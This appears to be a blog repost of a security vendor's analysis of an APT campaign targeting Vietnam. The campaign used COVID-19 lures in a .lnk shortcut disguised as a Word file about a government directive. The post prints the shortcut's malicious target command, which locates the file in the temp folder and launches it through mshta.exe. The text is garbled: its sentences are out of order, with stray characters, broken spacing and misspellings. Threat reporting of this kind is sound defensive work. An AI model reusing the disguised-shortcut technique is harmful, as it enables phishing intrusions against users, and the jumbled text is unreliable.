![]() ![]() ![]() ![]() %comspec% / c for %x in (%temp% = %) do for / f "delims =" %i in ('dir "%x \ Chi Thi thuong nguyen xuan phuc.lnk" / s / b'wind) start m%wind -1,1%hta.exe "%i" Normally the shortcut target target usually points to a destination folder or file, but the target of this template contains the command with the form: However, this winword file uses a suspicious target. The sample file is a shortcut file with the extension ".lnk" hidden as a winword file to deceive users because the ".lnk" extension will be hidden by Windows. Through this malicious pattern Threat Intelligence system is involved with some of the recent samples that we have warnings about.ĬMC WARNING NEW APT CAMPAIGN ADVANTAGES UNIKEY ATTACKING USERS IN VIETNAMĬMC CYBER SECURITY ANALYSIS OF LNK MALWARE FORM OF APT PANDA GROUP The malware was injected in a word file with the title: "Chi Thi thuong nguyen xuuc phuc" to deceive users, this code is currently collected by us through the CMC Threat Intelligence system. Recently taking advantage of the stressful situation of the COVID-19 influenza, the malicious code similar to those developed by the Panda hacker group was found to impersonate three government notices about the outbreak. Recently, due to the complicated development of COVID 19, many hacker groups took advantage of this to conduct APT campaigns aimed at organizations around the world, as well as appear campaigns in Vietnam.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. Archives
June 2023
Categories |